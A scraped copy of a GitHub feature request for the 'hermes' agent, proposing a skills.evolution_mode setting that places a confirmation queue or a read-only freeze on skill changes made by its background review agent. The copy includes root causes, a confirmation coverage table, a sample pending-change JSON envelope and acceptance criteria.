hermes - 💡(How to fix) Fix [Feature]: Add `skills.evolution_mode` — confirmation gate for autonomous skill evolution

Official PRs (…)
ON THIS PAGE

Recommended Tools

×6

Utilities matched from this issue’s tags and category — try them while you read without losing context.

GitHub issue graph ai analysis

Paste a GitHub issue URL. We fetch that issue, discover linked issues from bodies/comments/timeline, collect linked pull requests, and produce a structured English report.

The report is written in English Markdown for sharing and archival.

Helpful · Quick feedback

Loading…

Root Cause

The background review agent (_spawn_background_review) can create, patch, edit, and delete skills in ~/.hermes/skills/ without any user confirmation. This is acceptable for personal workflows, but in shared or production deployments it may introduce unintended workflow mutations, difficult-to-audit state transitions, and operational instability. Example failure mode: A background review patch to an existing skill passed the current skills_guard security scan and was applied immediately via clear_skills_system_prompt_cache(clear_snapshot=True). Because the change became active within the same runtime session, downstream workflow behavior changed without any approval, diff review, staging step, or rollback checkpoint. The only observable signal was a single log entry:

💾 Skill patched

As a result, operators had no opportunity to inspect or reject the mutation before it affected the live skill environment.

Fix Action

Fix / Workaround

The background review agent (_spawn_background_review) can create, patch, edit, and delete skills in ~/.hermes/skills/ without any user confirmation. This is acceptable for personal workflows, but in shared or production deployments it may introduce unintended workflow mutations, difficult-to-audit state transitions, and operational instability. Example failure mode: A background review patch to an existing skill passed the current skills_guard security scan and was applied immediately via clear_skills_system_prompt_cache(clear_snapshot=True). Because the change became active within the same runtime session, downstream workflow behavior changed without any approval, diff review, staging step, or rollback checkpoint. The only observable signal was a single log entry:

💾 Skill patched

As a result, operators had no opportunity to inspect or reject the mutation before it affected the live skill environment.

  1. Existing guard only catches malicious patterns. skills.guard_agent_created (default: False) runs regex-based security scanning, but this detects malware, not incorrect or premature skill updates. A well-intentioned but wrong patch passes the guard clean.
ScenarioConfirmation?
CLI hermes skills installYes (input() prompt)
Slash /skills installNo (TUI limitation — skip_confirm=True)
Background review → skill_manage(create)No
Background review → skill_manage(patch/edit)No
Background review → skill_manage(delete)No
Agent in-conversation → skill_manageNo (schema-level advisory guidance only)

Code Example

💾 Skill patched

---

{
  "id": "20260507-a1b2c3",
  "action": "patch",
  "skill_name": "react-i18n-setup",
  "timestamp": "2026-05-07T10:30:00Z",
  "origin": "background_review",
  "diff": "--- a/SKILL.md\n+++ b/SKILL.md\n...",
  "skill_dir_snapshot": "/path/to/.pending/20260507-a1b2c3/react-i18n-setup/"
}

---

💾 1 pending skill change(s):
  [patch] react-i18n-setup — added fallback chain step (background_review)

Review? [y]es / [n]o / [d]iff / [s]kip all

---

💾 1 skill change suppressed (skills.evolution_mode=readonly)

---
RAW_BUFFERClick to expand / collapse

Problem or Use Case

Problem

The background review agent (_spawn_background_review) can create, patch, edit, and delete skills in ~/.hermes/skills/ without any user confirmation. This is acceptable for personal workflows, but in shared or production deployments it may introduce unintended workflow mutations, difficult-to-audit state transitions, and operational instability. Example failure mode: A background review patch to an existing skill passed the current skills_guard security scan and was applied immediately via clear_skills_system_prompt_cache(clear_snapshot=True). Because the change became active within the same runtime session, downstream workflow behavior changed without any approval, diff review, staging step, or rollback checkpoint. The only observable signal was a single log entry:

💾 Skill patched

As a result, operators had no opportunity to inspect or reject the mutation before it affected the live skill environment.

Root causes

  1. No audit trail before impact. Skill changes take effect immediately. The only signal is a one-line log — no diff, no review step, no rollback option before activation.

  2. The current confirmation requirement is not enforceable for detached execution flows. The skill_manage schema description includes guidance such as "Confirm with user before creating/deleting", but background review runs in a detached execution context with no interactive I/O surface. As a result, skill_manage operations originating from background review are applied directly to disk without a runtime approval boundary.

  3. Existing guard only catches malicious patterns. skills.guard_agent_created (default: False) runs regex-based security scanning, but this detects malware, not incorrect or premature skill updates. A well-intentioned but wrong patch passes the guard clean.

Current confirmation coverage

ScenarioConfirmation?
CLI hermes skills installYes (input() prompt)
Slash /skills installNo (TUI limitation — skip_confirm=True)
Background review → skill_manage(create)No
Background review → skill_manage(patch/edit)No
Background review → skill_manage(delete)No
Agent in-conversation → skill_manageNo (schema-level advisory guidance only)

Security Impact

No new attack surface. confirm and readonly modes restrict what autonomous code can do — they never grant additional privileges. The pending queue is written to the same ~/.hermes/skills/ directory the agent already has access to. skills_guard scanning still runs on the content before it enters the pending queue, maintaining the existing security baseline.

Acceptance Criteria

  • skills.evolution_mode config key registered with auto (default) / confirm / readonly values
  • auto mode preserves current behavior exactly (backward compatibility)
  • readonly mode suppresses all skill_manage calls from background review (returns suppressed: True)
  • confirm mode redirects background review skill_manage writes to ~/.hermes/skills/.pending/
  • Pending queue stores manifest.json with diff, metadata, and skill snapshot
  • /skills review slash command lists pending changes with apply/discard/diff options
  • hermes skills review CLI command with --apply-all / --discard-all flags
  • Pending changes older than pending_ttl_days are auto-discarded on session start
  • Non-interactive surfaces (Telegram, Discord, gateway) announce pending changes via platform message
  • skills_guard scanning still runs on content before it enters pending queue
  • Tests for confirm and readonly modes in test_skill_manager_tool.py
  • Tests for pending queue lifecycle in test_skills_review.py

Related

  • #20375 — surface skill candidates before background skill creation (creation-time dedup, complements this change-time gate)
  • #20708 — Permission Gateway RBAC (who can use a skill; this issue is about whether a change should go live)

Related Code Paths

  • Background review spawn: run_agent.py:3218 (_spawn_background_review)
  • Skill write operations: tools/skill_manager_tool.py:326-637 (_create_skill, _edit_skill, _patch_skill, _delete_skill)
  • Security scanner: tools/skills_guard.py:41-51 (INSTALL_POLICY)
  • Guard config: tools/skill_manager_tool.py:56-69 (_guard_agent_created_enabled)
  • Skill cache invalidation: tools/skill_manager_tool.py:696-699 (clear_skills_system_prompt_cache)
  • Existing approval system: tools/approval.py

Feature Type

Configuration option / Safety & reliability

Scope

pending queue module + changes across skill_manager, config, CLI, slash commands, run_agent.etl

Proposed Solution

Proposed Solution

Introduce a skills.evolution_mode configuration key with three modes:

auto (default — current behavior)

No change. Background review writes skills directly. Preserves backward compatibility for personal / development use.

confirm (new — pending approval queue)

Background review writes proposed changes to a pending directory (~/.hermes/skills/.pending/) instead of the live skill store. Each pending change is stored as a JSON envelope:

{
  "id": "20260507-a1b2c3",
  "action": "patch",
  "skill_name": "react-i18n-setup",
  "timestamp": "2026-05-07T10:30:00Z",
  "origin": "background_review",
  "diff": "--- a/SKILL.md\n+++ b/SKILL.md\n...",
  "skill_dir_snapshot": "/path/to/.pending/20260507-a1b2c3/react-i18n-setup/"
}

On the next user interaction (or via explicit /skills review), Hermes presents the pending changes:

💾 1 pending skill change(s):
  [patch] react-i18n-setup — added fallback chain step (background_review)

Review? [y]es / [n]o / [d]iff / [s]kip all
  • y — apply: move from .pending/ to live skills/, call clear_skills_system_prompt_cache
  • n — discard: remove from .pending/
  • d — show full diff, then re-prompt
  • s — discard all pending

For non-interactive surfaces (Telegram, Discord, gateway), pending changes are announced via the platform message and confirmed via a reply or button interaction.

readonly (new — frozen skills)

Only operator-initiated installation flows or direct filesystem edits may modify the live skill store.

💾 1 skill change suppressed (skills.evolution_mode=readonly)

Alternatives Considered

No response

Feature Type

Configuration option

Scope

Large (new module or significant refactor)

Contribution

  • I'd like to implement this myself and submit a PR

Debug Report (optional)

Vote matrix · Quick signals

Works
Did the solution work? Tap to confirm.
Easy Fix
Was it a quick fix?
Time Saver
Did it save you time?
Blocking
Was it severely blocking?
Common Issue
Are others likely hitting this too?
Flaky / Intermittent
Is it intermittent?
Verified / Reproducible
Can you reproduce it reliably?
Loading…

Still need to ship something?

×6

Another batch ranked right after the header list — different links, same matching logic.

Back to top recommendations

TRENDING